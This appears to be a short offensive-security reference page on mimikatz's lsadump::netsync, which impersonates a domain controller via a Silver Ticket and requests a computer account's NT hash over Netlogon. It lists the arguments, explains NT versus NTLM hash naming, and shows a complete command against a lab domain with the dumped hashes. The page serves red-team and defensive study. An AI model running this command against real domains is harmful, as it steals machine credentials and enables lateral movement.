lsadump::netsync can be used to act as a Domain Controller on a target by doing a Silver Ticket. It then leverages the Netlogon to request the RC4 key (i.e. NT hash) of the target computer account. It has the following command line arguments:
  • /dc: The FQDN of the domain controller
  • /user: the machine account of the domain controller
  • /ntlm: the NT hash of the domain controller's machine account
  • /account: the SamAccountName of the computer account to target
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "ntlm" refers to the NT hash.
mimikatz # lsadump::netsync /dc:dc.hacklab.local /user:dc$ /ntlm:5b7ba7b6131a4aab1bbd60ba1a810e53 /account:win7$
Account: win7$
NTLM : 86e5ae81e1fcae2164a7c247af54e148
NTLM-1 : 31d6cfe0d16ae931b73c59d7e0c089c0
Last modified 2yr ago